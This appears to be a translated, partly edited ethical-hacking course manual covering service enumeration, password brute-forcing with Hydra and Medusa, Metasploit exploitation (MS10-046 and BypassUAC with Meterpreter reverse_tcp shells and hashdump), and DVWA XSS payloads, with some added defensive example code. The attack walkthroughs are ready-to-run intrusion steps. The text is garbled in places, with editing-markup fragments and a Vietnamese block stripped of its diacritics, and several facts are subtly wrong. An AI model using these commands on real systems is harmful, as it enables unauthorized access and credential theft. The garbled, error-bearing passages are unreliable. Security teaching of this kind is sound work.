Enumeration is the next step in gathering information about an organization; it takes place after scanning and is the process of collecting and analyzing user names, machine names, shared resources and services. It actively queries or connects to the target to obtain more useful information. Enumeration can be defined as the process of extracting the information obtained during scanning into an ordered system. The extracted information includes everything related to the attack target, such as user names, host names, services and shares. Enumeration techniques are run from inside the environment. Enumeration includes connecting to the system and directly pulling out information. The purpose of enumeration is to identify user accounts and system accounts that can be used to hack a target. It is not necessary to find an administrator account, because we can escalate such an account to a level with enough privilege to access more accounts than were granted originally.
II. Banner Grabbing
The most basic enumeration technique is banner grabbing. It can be defined simply as connecting to a remote application and observing the output. It yields plenty of information for a remote attacker. At the very least we can identify the service that is running, which in many cases is the starting point for vulnerability research.
Countermeasure: disable unnecessary services. We can restrict access to services with network access control.
III. Enumerating Network Services
1. HTTP fingerprinting
a) Telnet
TELNET (short for TerminaL NETwork) is a network protocol used on Internet connections or on connections to a local area network (LAN). The IETF document STD 8 (also known as RFC 854 and RFC 855) states that the purpose of the TELNET protocol is to provide a fairly general, bi-directional, eight-bit byte-oriented communications facility. TELNET is a client-server protocol based on TCP, and the client (the user) usually connects to port 23 on a server, which provides the application program that executes the services.

Use telnet to learn information from an open service port; it retrieves information remotely through the telnet client, which almost every operating system supports.
C:\>telnet www.google.com 80

b) Netcat
A tool that lets you read and write data over TCP and UDP. Netcat can be used as a port scanner, backdoor, port redirector, port listener, ...
Using netcat from the command line:
- Connect mode: nc [-options] hostname port1[-port2]
- Listen mode: nc -l -p port [-options] [hostname] [port]
Example:
Grabbing the server's banner:
nc -n 192.168.10.102 80
Port scanning: run netcat with the -z option. For example, scanning TCP ports 1 to 500 of host 192.168.10.102.
nc -v www.google.com 80
www.google.com [74.215.71.105] 80 (http) open

c) OpenSSL
OpenSSL is a collaborative effort to develop a full-featured open-source toolkit implementing the SSL (version 2 and version 3) and TLS (version 1) protocols, managed by a worldwide community of volunteers who use the Internet to communicate and to develop the OpenSSL toolkit and its documentation.
Most software such as IMAP & POP, Samba, OpenLDAP, FTP, Apache and others requires the user to be authenticated before the service may be used. By default, however, the user name and password are transmitted as plain text, so they can be read or altered by someone else. Encryption techniques such as SSL ensure the confidentiality and integrity of data: with them, information travelling over the network is encrypted end to end. Once OpenSSL is installed on a Linux server we can use it as a third-party tool that lets other applications use SSL features.
OpenSSL is a cryptographic toolkit implementing the SSL and TLS network protocols and the related cryptographic standards. The openssl program is a command-line tool that uses the cryptographic functions of OpenSSL's own crypto library. OpenSSL provides libraries that offer cryptographic functions to applications such as secure web servers.
It is open-source software that can be used for both commercial and non-commercial purposes, with strong encryption available worldwide. It supports the SSLv2, SSLv3 and TLSv1 protocols, both RSA and Diffie-Hellman ciphers, DSO, support for OpenSSL and RSAref (US), improved passphrase handling for private keys, X.509 certificate-based authentication for both client and server, support for X.509 certificate revocation lists, and per-URL tuning of the SSL handshake parameters.
2. DNS Enumeration
DNS enumeration is the process of locating all the DNS servers of an organization and their corresponding records. A company may have both internal and external DNS servers, which can yield information such as user names, computer names and IP addresses of potential target systems. Many tools can be used to gather information for DNS enumeration. Examples of tools for enumerating DNS are nslookup, DIG, the American Registry for Internet Numbers (ARIN) and Whois. To enumerate DNS we must understand DNS and how it works.
We must know the DNS record types. The list of DNS records gives an overview of the resource record types (database records) stored in the zone files of the Domain Name System (DNS). DNS implements a distributed, hierarchical and redundant database of information associated with Internet domain names and addresses. In these domain servers, different record types are used for different purposes. The following list describes the common DNS record types and their use:
A (address) - Maps a host name to an IP address
SOA (Start of Authority) - Identifies the DNS server responsible for the domain information
CNAME (canonical name) - Provides additional names or aliases for the address record
MX (mail exchange) - Identifies the mail servers for the domain
SRV (service) - Identifies services such as directory services
PTR (pointer) - Maps IP addresses to host names
NS (name server) - Identifies other name servers for the domain

A DNS zone transfer is normally used to replicate DNS data across a number of DNS servers, or to back up DNS files. A user or server performs a zone transfer request against a specific name server. If the name server allows zone transfers, all the DNS names and IP addresses hosted by that name server are returned in human-readable ASCII text.
nslookup
We can also run the command directly as follows:
nslookup -type=any tuoitre.vn
type is the record type, as listed above: NS (name server), MX (mail exchange), any (all).
tuoitre.vn: a domain


3. NetBIOS name
NetBIOS is an acronym for Network Basic Input/Output System. It provides services related to the session layer of the OSI model, allowing applications on separate computers to communicate over a local area network. Being strictly an API, NetBIOS is not a network protocol. Older operating systems ran NetBIOS over IEEE 802.2 and IPX/SPX using the NetBIOS Frames (NBF) and NetBIOS over IPX/SPX (NBX) protocols respectively. In modern networks, NetBIOS normally runs over TCP/IP via the NetBIOS over TCP/IP (NBT) protocol. As a result, each computer in the network has both a NetBIOS name and an IP address corresponding to a (possibly different) host name.
A NetBIOS name is a mechanism for naming the resources of a system in a flat namespace (there is no notion of hierarchy).


Chapter 5: PASSWORD CRACKING
I. Introduction
Password cracking is the process of finding or recovering a password for various purposes. The purpose of password cracking is to help a user recover a forgotten password, or to gain unauthorized access to a system.
II. Password Cracking Techniques
1. Dictionary Attacks/Hybrid Attacks
The attack uses a prepared dictionary file containing hashes and compares them with the hash of the password; if the hashes match, the plaintext form of the password is found.
We can add to or permute the words in the dictionary (hybrid attack). This approach works well when the password consists of ordinary characters; it is fast, and its success rate depends on the dictionary.
2. Brute Forcing Attacks
Feeds every combination of all characters through the hash and compares. Success is certain given enough time, but cracking takes very long when the password is long and complex. It is only good for short passwords.
3. Syllable Attacks/Pre-Computed Hashes
Combines the two approaches above by precomputing hash tables of all character combinations and only comparing during the hashing phase. Cracking takes only a few minutes if the hash tables are already available.
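As an added illustration of why the pre-computed-hash approach works against unsalted hashes and fails against salted, stretched ones (example code, not part of the original manual), the following Python script builds a table from a constructed five-word list, recovers an unsalted MD5 in one lookup, and then shows that a PBKDF2 record with a per-user random salt forces every candidate to be rehashed for each user. The word list and the 100,000-iteration work factor are assumptions.

```python
import hashlib
import os

# Constructed wordlist standing in for a password dictionary; real lists hold millions of entries.
WORDLIST = ["123456", "password", "12345", "qwerty", "letmein"]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_precomputed_table(words):
    """Hash every candidate once, ahead of time: the pre-computed hash table of the text."""
    return {md5_hex(w): w for w in words}


def lookup_unsalted(table, stored_hash):
    """An unsalted hash is recovered with a single dictionary lookup, however many users there are."""
    return table.get(stored_hash)


def salted_hash(password, salt, iterations=100_000):
    """PBKDF2-HMAC-SHA256 with a per-user random salt and a work factor: the defence."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def new_user_record(password):
    """What a server should store: the salt in the clear next to the salted, stretched hash."""
    salt = os.urandom(16)
    return salt, salted_hash(password, salt)


def crack_salted(words, salt, stored_hash, iterations=100_000):
    """With a salt nothing can be precomputed: each candidate is rehashed under this user's salt.
    Returns (recovered password or None, number of hash computations spent)."""
    for n, w in enumerate(words, 1):
        if salted_hash(w, salt, iterations) == stored_hash:
            return w, n
    return None, len(words)


if __name__ == "__main__":
    table = build_precomputed_table(WORDLIST)
    print("unsalted md5 of '12345' found:", lookup_unsalted(table, md5_hex("12345")))
    salt, record = new_user_record("12345")
    print("salted, same password, (found, hashes spent):", crack_salted(WORDLIST, salt, record))
```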
III. Common Attack Types
1. Active Password Cracking
Find a valid user name and then guess the password for that user name. The process can be automated to speed up the search.
Forms of active password cracking:
o Password guessing: uses a dictionary of words and common passwords and tries every combination to crack the passwords. This attack takes much time and network bandwidth and is easily detected.
o Trojan/Spyware/Keylogger: a program running in the background that lets the attacker record every key pressed (keylogger), secretly gather information about individuals or organizations (spyware), or, with the help of a trojan, gain access to stored passwords, read private documents and delete files.
2. Passive Password Cracking
Capture the login exchange on the wire and break the password offline (sniffing, MITM).
These attacks include:
o Wire sniffing: the attacker runs packet-sniffing tools on the LAN to access and record live network traffic. The captured data may include passwords sent to remote systems during Telnet, FTP and rlogin sessions and in e-mail sent and received.
o Man-in-the-Middle (MITM) and Replay Attack: in a MITM attack the attacker gains access to the communication channel between the victim and the server to look for information; in a replay attack, packets and authentication tokens are captured with a sniffer.
3. Offline Password Cracking
Direct physical access to the victim's computer to copy the files that store the credentials. For example, the SAM database on Windows (%systemroot%/system32/config) or /root/passwd on Linux. John can then be used to find the plaintext password.
IV. Password Cracking Tools
1. Hydra
a) Introduction
Hydra is a very fast network logon cracker that supports many different protocols and services.
Hydra is a parallelized logon cracker, meaning it runs many tasks at once so that cracking proceeds faster.
The tool lets researchers and security consultants show how easy it would be to gain unauthorized remote access to a system.

b) Usage
The general syntax of Hydra is:
hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t TASKS] [-w WAIT] [server | IP] [service://server[:port]]

Example:
hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1
Where:
-f: finish: stop once the first valid user name/password pair is found
-L: user name file (-l user name)
-P: password file (-p password)
192.168.10.1: IP address of the host whose login password is being cracked
http-get: the HTTP service on port 80 (http has been replaced by http-get and http-head)
http://192.168.10.1 is the web page required for the cracking process.

2. Medusa
a) Introduction
Medusa can be used to brute-force logins module by module in a fast, parallel fashion. Its goal is to support as many services that allow remote authentication as possible.
Medusa was designed around three features:
Thread-based parallel testing: it can test multiple hosts, user names and passwords at once.
Modular design: each service exists as an independent .mod file. We do not need to modify the core to extend the list of services supported for brute-forcing.

b) Usage
Syntax:
medusa [-h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] -M module [OPT]
-h host or IP address, -H file containing the hosts
-u user name, -U file containing the user names
-p password, -P file containing the passwords
-C file combining host, user name and password in the form host:username:password
-M module is mandatory and is followed by the name of a supported module. To list all modules type: medusa -d, and for detailed usage of one module: medusa -M module_name -q


V. Password Cracking on Specific Protocols
1. HTTP (HyperText Transfer Protocol)
a) Concept
This is the hypertext transfer protocol, commonly used by web applications (World Wide Web, WWW) on the default port 80.
b) HTTP has two forms of authentication:
Basic access authentication: a method by which a web browser or other program supplies a user name and password when asked. It is supported by every web browser; however, because the user name and password are sent as plain text, it is rarely used in practice. Logging in to a router is a typical example.

We can capture it with Wireshark:
As the figure shows, the captured user name and password are admin:12345
Digest access authentication: one of the agreed methods a web server can use to negotiate credentials with the user's web browser. It applies a hash function to the sensitive information before sending it across the network.
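To make the difference between the two schemes concrete (added example code, not part of the original manual), the following Python script builds the Basic header for the admin:12345 credentials seen in the capture and decodes it the way a sniffer would, then builds the RFC 2617 Digest response for the same credentials and checks what each header reveals. The realm, nonce and URI are invented values.

```python
import base64
import hashlib

# Constructed values: the credentials are the ones read off the Wireshark capture in the text;
# realm, nonce and URI are invented for the example.
USERNAME, PASSWORD = "admin", "12345"
REALM, NONCE, URI = "router", "dcd98b7102dd2f0e8b11d0f600bfb0c093", "/"


def basic_header(username, password):
    """What the browser sends for Basic auth: base64 of 'user:pass', which is encoding, not protection."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def credentials_from_basic(header_line):
    """What anyone on the wire (a Wireshark capture, as in the text) recovers from a Basic header."""
    scheme, token = header_line.split(":", 1)[1].split()
    if scheme != "Basic":
        raise ValueError("not a Basic authorization header")
    user, password = base64.b64decode(token).decode().split(":", 1)
    return user, password


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 Digest without qop: MD5(HA1:nonce:HA2), HA1 = MD5(user:realm:pass), HA2 = MD5(method:uri)."""
    def md5(s):
        return hashlib.md5(s.encode()).hexdigest()
    ha1 = md5(f"{username}:{realm}:{password}")
    ha2 = md5(f"{method}:{uri}")
    return md5(f"{ha1}:{nonce}:{ha2}")


def digest_header(username, realm, password, method, uri, nonce):
    """The Digest header carries only the hashed response; the password itself never leaves the client."""
    response = digest_response(username, realm, password, method, uri, nonce)
    return (f'Authorization: Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{response}"')


def password_recoverable(header_line, password):
    """True when the header line hands the password to a sniffer directly (plain or base64-decoded)."""
    if header_line.startswith("Authorization: Basic "):
        return credentials_from_basic(header_line)[1] == password
    return password in header_line


if __name__ == "__main__":
    basic = basic_header(USERNAME, PASSWORD)
    digest = digest_header(USERNAME, REALM, PASSWORD, "GET", URI, NONCE)
    print(basic, "->", credentials_from_basic(basic))
    print(digest)
    print("password readable on the wire: basic =", password_recoverable(basic, PASSWORD),
          "digest =", password_recoverable(digest, PASSWORD))
```

Digest keeps the password off the wire, but the exchange still travels over plaintext HTTP; TLS is what actually protects the login.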
c) Cracking an HTTP password
We can use nmap (Network Mapper) to scan for the open ports:
Open the browser to check the authentication prompt:
When the Cancel button is pressed we get the message:
In a Terminal on BackTrack 5 type: hydra -f -L login.txt -P password.txt 192.168.10.1 http-get http://192.168.10.1
Where:
-f: finish: stop once the first valid user name/password pair is found
-L: user name file (-l user name)
-P: password file (-p password)
192.168.10.1: IP address of the host whose login password is being cracked
http-get: the HTTP service on port 80 (http has been replaced by http-get and http-head)
http://192.168.10.1 is the web page required for the cracking process.

Or: medusa -h 192.168.10.1 -U login.txt -P password -M http
Where:
-h host or IP address of the host whose login password is being cracked.
-U: user name file (-u user name)
-P: password file (-p password)
-M http: the protocol to crack. -M stands for module


Then we return to the web browser and enter the user name and password that were found:




2. SSH (Secure Shell)
a) Concept
SSH is a network protocol for secure data communication, remote shell services or command execution, and other secure network services between networked computers. It connects a server and a client (running the SSH server and SSH client programs) through a secure channel over an insecure network.
The best-known application of the protocol is access to shell accounts on Unix-like operating systems (Linux). It was created to replace insecure protocols such as telnet, rsh and rexec, which send the password as plain text where it can easily be read.
SSH operates on TCP port 22.
b) Cracking a password over SSH
Check whether the ssh service is running:
With hydra: hydra -f -L login.txt -P password.txt 192.168.10.101 ssh
With Medusa: medusa -h 192.168.10.101 -U login.txt -P password.txt -M ssh
And this is how the Nokia N900 device is accessed remotely with the user name and password that were found:
For example, checking the remote network cards:
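The Hydra and Medusa runs described in section IV and in this SSH walkthrough leave a very recognisable trace in the target's authentication log; as an added defensive example (not part of the original manual), the following Python script runs detection logic over constructed sshd log lines and reports each source that produced a burst of failed logins, how many user names it cycled through, and whether a success followed the burst. The log lines, host name and year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines in syslog style (year assumed to be 2012; syslog omits it).
# 192.168.10.50 fails five logins in three seconds with five different user names, then succeeds,
# the shape a hydra -L/-P run leaves behind; 192.168.10.7 mistypes once and then logs in.
SAMPLE_AUTH_LOG = """\
May 10 10:00:00 n900 sshd[1201]: Failed password for invalid user admin from 192.168.10.50 port 40001 ssh2
May 10 10:00:00 n900 sshd[1202]: Failed password for invalid user test from 192.168.10.50 port 40002 ssh2
May 10 10:00:01 n900 sshd[1203]: Failed password for root from 192.168.10.50 port 40003 ssh2
May 10 10:00:01 n900 sshd[1204]: Failed password for user from 192.168.10.50 port 40004 ssh2
May 10 10:00:02 n900 sshd[1205]: Failed password for invalid user guest from 192.168.10.50 port 40005 ssh2
May 10 10:00:02 n900 sshd[1206]: Accepted password for user from 192.168.10.50 port 40006 ssh2
May 10 10:07:30 n900 sshd[1310]: Failed password for user from 192.168.10.7 port 51000 ssh2
May 10 10:07:40 n900 sshd[1311]: Accepted password for user from 192.168.10.7 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse(log, year=2012):
    """Return (timestamp, outcome, username, source) tuples for the login lines in the log."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events


def brute_force_sources(events, window_seconds=60, max_failures=4):
    """Flag sources with more than max_failures failed logins inside any window_seconds span.

    For each flagged source the report gives the failures in the burst, how many distinct user
    names were tried (a login wordlist shows up here) and whether a success followed the burst,
    which is the case that needs an immediate response rather than just a block rule."""
    by_src = defaultdict(list)
    for ts, outcome, user, src in events:
        by_src[src].append((ts, outcome, user))
    report = {}
    for src, items in by_src.items():
        items.sort()
        fails = [(ts, user) for ts, outcome, user in items if outcome == "Failed"]
        lo = 0
        for hi in range(len(fails)):
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_seconds:
                lo += 1
            if hi - lo + 1 > max_failures:
                burst_end = fails[hi][0]
                report[src] = {
                    "failures": hi - lo + 1,
                    "usernames": len({user for _, user in fails[lo:hi + 1]}),
                    "success_after_burst": any(
                        outcome == "Accepted" and ts >= burst_end for ts, outcome, _ in items
                    ),
                }
                break
    return report


if __name__ == "__main__":
    for src, info in brute_force_sources(parse(SAMPLE_AUTH_LOG)).items():
        print(src, info)
```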


3. SMB (Server Message Block)
a) Concept
SMB, also known as the Common Internet File System (CIFS), operates at the application layer of the OSI model and is commonly used to provide shared access to files, printers and various communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most uses of SMB involve Microsoft Windows.
SMB can run on top of the session layer or lower:
o Directly over TCP port 445;
o Via NetBIOS (which provides session-layer services of the OSI model, allowing applications on separate computers to communicate over a LAN) over UDP ports 137 and 138 and TCP ports 137 and 139
b) Cracking an SMB password
Scan to see whether any machine is running the SMB service on port 445:
With Hydra we type: hydra -f -L login.txt -P password.txt 192.168.10.100 smb
With Medusa we type: medusa -h 192.168.10.100 -U login.txt -P password.txt -M smbnt
And this is how we use the user name and password that were found

4. RDP (Remote Desktop Protocol)
a) Concept
RDP is a proprietary protocol developed by Microsoft that provides a user with a graphical interface to another computer. Microsoft currently calls its RDP server software Remote Desktop Services, formerly Terminal Services, and the client software Terminal Services Client.
When connecting to a remote computer we are asked for a matching user name and password. So cracking the RDP password is necessary if we want access without the user's consent.
RDP operates on TCP port 3389
b) Cracking an RDP password
Scan the computers to see whether port 3389 is open:
With Hydra: hydra -f -L login.txt -P password.txt 192.168.10.100 rdp -t 4 -w 1
Medusa does not support the RDP protocol directly. However, we can use the wrapper module with rdesktop as the script. We proceed as follows:
medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -h 192.168.10.100 -U login.txt -P password.txt
However, the program still does not work quite right and takes a long time, since the attacker has to enter each password one at a time.
This is how rdesktop is used to control the remote computer with the user name and password that were found:



Chapter 6: SYSTEM HACKING

I. INTRODUCTION TO METASPLOIT
1. Introduction
Metasploit is a computer security project that provides information about security vulnerabilities and aids penetration testing and the development of intrusion detection systems. A very well-known sub-project of Metasploit is the Metasploit Framework.
The Metasploit Framework is an environment for testing, attacking and exploiting bugs in services. Metasploit was built with the object-oriented language Perl, with components written in C, assembler and Python. Metasploit runs on most operating systems: Linux, Windows, MacOS. We can download the program from www.metasploit.com
The current version of Metasploit is 4.4.
2. Metasploit Components
Metasploit offers several user interfaces:
Console interface: the msfconsole command. The msfconsole interface uses command lines to configure and test, which is faster and more flexible
Web interface: msfweb, which interacts with the user through a web interface
Command line interface: msfcli
Environment:
Global Environment: handled with the two commands setg and unsetg; options set here are global and are applied to all exploit modules
Temporary Environment: handled with the two commands set and unset; this environment applies only to the exploit module currently loaded and does not affect other exploit modules
We can save the environment we configured with the save command. The environment is saved in ./msf/config and is loaded again when the user interface starts
3. Using the Metasploit Framework
a) Choose an exploit module
Select the vulnerable program or service that Metasploit supports exploiting
show exploits: list the exploit modules the framework supports
use exploit_name: select the exploit module
info exploit_name: view information about the exploit module
We should regularly update the service bugs and modules from www.metasploit.com, or with the msfupdate command, or with svn update /opt/metasploit/msf3/
b) Configure the chosen exploit module
show options: determine which options need to be configured
set: configure the module's options
Some modules have advanced options, which we can view with the command show advanced
c) Verify the options just configured
check: checks whether the options have been set correctly.
d) Choose the target
Choose the operating system to run against
show targets: the targets provided by the module
set: specify the target
e.g.: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) Choose the payload
The payload is the code that runs on the remote system; it is the part of a computer virus that executes the malicious code.
show payloads: list the payloads of the current exploit module
info payload_name: view detailed information about the payload
set payload payload_name: specify the payload module by name. After choosing a payload, use show options to view the payload's options
show advanced: view the payload's advanced options
f) Run the exploit
exploit: the command that runs the payload code. The payload then gives us information about the exploited system
4. Introduction to the Meterpreter Payload
Meterpreter, short for Meta-Interpreter, is an advanced payload included in the Metasploit Framework. Its purpose is to provide a command set for exploiting and attacking remote computers. It was written by its developers as shared object (DLL) files. Meterpreter and its extensions execute in memory and are never written to disk, so they can evade detection by antivirus software.
Meterpreter provides a set of commands we can use on remote computers:
Fs (Filesystem): interaction with the file system
Net: viewing the remote machine's network information such as IP address and routing table
Process: interaction with the processes on the remote machine
Sys: viewing system information and the environment of the remote machine
a) Using the Fs module
cd directory: like the command-line cd, changes the working directory
getcwd: shows the current working directory
ls: lists directories and files
upload src1 [src2 ...] dst: uploads files from src to dst.
download src1 [src2 ...] dst: downloads files from src to dst.
b) Using the Net module
ipconfig: view the network card configuration of the remote computer
route: view the remote machine's routing table
c) Using the Process module
execute -f file [ -a args ] [ -Hc ]: the execute command creates a new process on the remote machine and uses that process to extract data
kill pid1 pid2 pid3: kill or stop processes running on the remote machine
ps: list the remote machine's processes
d) Using the Sys module
getuid: shows the current user name on the remote machine
sysinfo: shows information about the victim's computer: operating system, version, 32-bit or 64-bit platform

5. Countermeasures
Apply Microsoft's patches regularly. For example, to stop Metasploit exploiting the Lsass_ms04_011 bug, we must install Microsoft's patch. According to Microsoft's assessment this is a critical bug present in almost all Windows operating systems. We should apply hotfix number 835732 for this bug.
II. The MS10-046 Vulnerability (2286198)
1. Introduction
This is a very serious vulnerability in the Windows Shell of all the affected operating systems; it lets an attacker take complete control of Windows and execute code remotely. The bug was discovered in June 2010, and by August 2010 Microsoft had released patches.
The dangerous bug lies in Windows "shortcut" (*.lnk) files, which usually sit on the desktop or in the Start menu. By creating a shortcut file that embeds malicious code, a hacker can have that code executed automatically when the user views the shortcut file or the contents of a folder containing the malicious shortcut.
The affected Windows versions include:

Operating system
- Windows XP Service Pack 3
- Windows XP Professional x64 Edition Service Pack 2
- Windows Server 2003 Service Pack 2
- Windows Server 2003 x64 Edition Service Pack 2
- Windows Server 2003 with SP2 for Itanium-based Systems
- Windows Vista Service Pack 1 and Windows Vista Service Pack 2
- Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
- Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2*
- Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2*
- Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
- Windows 7 for 32-bit Systems
- Windows 7 for x64-based Systems
- Windows Server 2008 R2 for x64-based Systems*
- Windows Server 2008 R2 for Itanium-based Systems

2. Attack steps:
After booting BackTrack and logging in successfully, we open a Terminal and get:

We then type msfconsole and press Enter:

To find the ms10-046 module: search ms10-046 and press Enter

We then type:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader and press Enter

Use the command show options to see the parameters needed before the attack can be carried out:
o SRVHOST: the attacker's machine address, which listens for victims connecting to it
o SRVPORT: the listening port, by default http (80)


We then:
o set PAYLOAD windows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set lhost to the IP address: set LHOST 192.168.1.200. LHOST is a parameter of the PAYLOAD we just set above.

exploit to start the listening server on the attacking machine

On the victim's computer, create a shortcut by right-clicking the Desktop -> New -> Shortcut

Enter the attacking machine's address in "Type the location of the item": http://192.168.1.200/anything and choose Next

Name the newly created shortcut and press Finish. We then open this shortcut:


After a moment, on the attacking machine we have:

Use the sessions command to view the sessions Metasploit currently holds:

To interact with a session we run: sessions -i 1 (1 is the session id)

And now everything becomes easier, as the attacker has full control of the victim's machine. For example:
The sysinfo command retrieves information about the victim's machine:
The hashdump command retrieves the users' passwords in hashed form
</gr_repl>
<gr_replace lines="1465-1480" cat="clarify" orig="79">
A very useful command for getting to cmd (the command line): shell

3. Countermeasures
Install Windows patches regularly to avoid being exploited by hackers.
The patch, code-named KB2286198, contains a new version of the Shell32.dll file; this is an important update. Shell32.dll is a very important library file in Windows that contains a number of Windows Shell API functions. If Shell32.dll is faulty or wrongly updated, the computer will suffer the "Blue Screen of Death".

79


Lnh rt hu ch s dng cmd (command-line): shell

3. Cch phng chng
Thng xuyn cp nht cc bn v li ca Windows trch b hacker li
dng.

80

Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin
Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt
quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu
Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc"
hay Blue Screen.
III. The BYPASSUAC Vulnerability
1. Introduction
From Windows Vista onwards, Microsoft introduced a built-in utility called User Access Control (UAC). UAC increases the security of Windows by limiting application software to the privileges of a standard user. Therefore only software the user trusts receives administrative privileges; other software does not. However, even under an administrator account, applications are still limited as they are under other ordinary accounts.
All operating systems with built-in User Access Control are affected and can be exploited.
2. Attack steps
Open a Terminal, type msfconsole and press Enter:

use exploit/multi/handler. This module provides many functions of the Metasploit payload system for us to exploit, for example by running: run post/windows/escalate/bypassuac as in this case, and much more.
set PAYLOAD windows/meterpreter/reverse_tcp: allows a connection back to the attacking machine so it can be controlled easily.
set LHOST 192.168.1.202: the listening host, the IP address of the attacking machine
set LPORT 6789: the listening port, arbitrary as long as it is not already in use.

exploit to start the server.

We then create a backdoor that connects to the server we started beforehand.

After creating it, we copy the backdoor.exe file to the victim's computer and run it. We can use Samba to share files between Windows and Linux.
On the Windows computer we share the file with full access:

Back on the victim's computer, run the copied backdoor.exe file. On the attacking machine we then receive the following:

We have a session but not yet full control. To get it we run the command: run post/windows/escalate/bypassuac

We can view all supported commands with the command: help
3. Countermeasures
Unfortunately, as of now Microsoft has neither acknowledged the bug in UAC nor provided a patch for this vulnerability. A Microsoft spokesperson insisted there is no vulnerability in UAC at all. Therefore we need to install reputable antivirus and anti-backdoor software to avoid being exploited.


Chapter 7: WEB HACKING WITH DVWA
I. Introduction
For those of us who are new to studying hacking, a test environment is very important, but finding a realistic environment that matches one's level is not simple.
Conversely, those with hacking skill and experience surely also want to test how far their skills go and to improve them further.
DVWA (Damn Vulnerable Web Application) can meet the needs of both newcomers and those with a certain level of skill. DVWA is a framework with pre-built security holes following the OWASP top 10 web security weaknesses. Its levels from low to high can satisfy the needs of many people.
DVWA is a vulnerable PHP/MySQL web application. Its main goals are to help security professionals test their skills and tools in a legal environment, to help web developers understand the process of securing web applications better, and to aid teachers and students in teaching and learning web application security in a classroom environment.
II. Installing DVWA on BackTrack
Because this is a PHP framework, the simplest approach is to set up a web server with XAMPP first and then copy DVWA into it; we then use DVWA through the web interface.
1. Download and install XAMPP
Since it is open-source software, go to the XAMPP home page http://www.apachefriends.org/en/xampp.html and download the latest version.

After downloading XAMPP, open a Terminal and type the command shown in the figure below

Start XAMPP

Finally open the web browser and type http://localhost; we get XAMPP's main page as in the figure below:

2. Download and install DVWA
Go to http://www.dvwa.co.uk/ to download DVWA

Then extract the downloaded file and place it in the directory /opt/lampp/htdocs/

Open the web browser and type http://localhost/dvwa/; we get DVWA's main page as follows:

Note:
XAMPP must be started before DVWA can run.
On DVWA's login page, log in with the default account/password admin/password.
Preparation before attacking:
Open the web browser and type: localhost/dvwa. The form ip_address/dvwa can also be used


To exploit the bugs in DVWA (XSS, SQL Injection) we must set the Security Level to Low. At that level, the code we add is kept intact. At the High level, the htmlspecialchars() function converts the special characters, so the input is no longer what was entered. At the Medium level, the string <script> is removed, so it has no effect. Other HTML tags, however, still take effect as normal.
So we set the Security Level to low: choose DVWA Security -> Low -> Submit



III. Attack Techniques on DVWA
1. XSS (Cross-Site Scripting)
a) Introduction
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with Cascading Style Sheets in HTML), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP ...) HTML tags or dangerous script code that can harm other users. The injected code is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and may also consist of HTML tags.
XSS is one of the most common bugs; a great many websites suffer from it, which is why more and more people pay attention to it!
b) XSS classification
XSS can be classified as follows:
Stored XSS Attacks

Stored XSS is the form of attack in which the attacker injects a dangerous script (usually JavaScript) into our website through some function (e.g. writing comments, a guestbook, posting articles ...), so that when other members visit the website they are hit by the attacker's malicious code; this code is usually kept in the website's database, hence "stored". Stored XSS arises because we do not properly filter the data members submit, letting malicious code be saved into the website's database.
Reflected XSS Attacks
In this form, the attacker usually appends malicious code to our website's URL and sends it to the victim; if the victim opens the URL they are hit by the code. This happens because we do not filter the input coming from our website's URL.
XSS Attack Consequences
This form is similar to the two above. The difference lies in how the payload is delivered to the server. Even a read-only or brochureware site can be vulnerable to XSS. XSS can cause damage from small to large, such as taking over user accounts. An XSS attack can obtain the session cookie, causing the loss of the user account. It can also affect end-user data by installing a trojan, redirecting the visitor to another page, or altering the content of a page.
c) How XSS works
Basically, the operation of XSS can be described as follows:

[Figure: description of how XSS works]
Following this principle, a hacker can exploit security holes in a website. Any HTML tag can be a tool for an XSS attack; in particular the IMG and IFRAME tags let the browser load other websites when the HTML is rendered. Exploiting this principle, hackers can inject malicious code and subject the victim's machine to an XSS attack
d) Harm caused by XSS
XSS is usually used for the following purposes:
Stealing information
Giving the hacker access to sensitive information
Gaining free access to content that should require payment
Spying on the interests of network users
Defacing a web page
Denial of service (DoS) attacks
Malicious JavaScript can access any of the following:
- Persistent cookies (of the XSS-vulnerable site) maintained by the browser.
- In-memory cookies (of the XSS-vulnerable site).
- The names of all windows opened from the XSS-vulnerable site.
- Any information accessible from the current DOM (such as values and HTML code).

e) XSS attack
Run the script: <script>alert('XSS');</script> to show a message box in the web browser

The result we get, instead of the text simply being saved into the database:

View the user's cookie:
<script>alert(document.cookie);</script>

